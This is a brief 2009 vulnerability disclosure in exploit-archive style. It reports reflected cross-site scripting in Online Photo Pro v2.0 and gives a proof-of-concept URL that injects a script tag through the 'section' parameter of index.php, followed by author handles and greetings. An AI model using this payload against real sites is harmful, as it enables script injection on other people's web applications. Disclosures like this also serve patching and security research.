opp20-xss.txt
Posted on 20 April 2009
========================================================================================= Title : Cross-site Scripting (XSS) Vulnerability Software : Online Photo Pro v2.0 Vendor : www.esoftpro.com Date : 19 April 2009 Author : Vrs-hCk Contact : d00r@telkom.net Blog : c0li.BlogSpot.Com ========================================================================================= [-] Vulnerable ./index.php [-] Exploit http://[site]/[path]/index.php?section=<script>alert(123)</script> ========================================================================================= Greetz : Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy, bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh to Dia yg Ku Cintai (*_^) c0li.m0de.0n and Behave oR BeGone !!! =========================================================================================
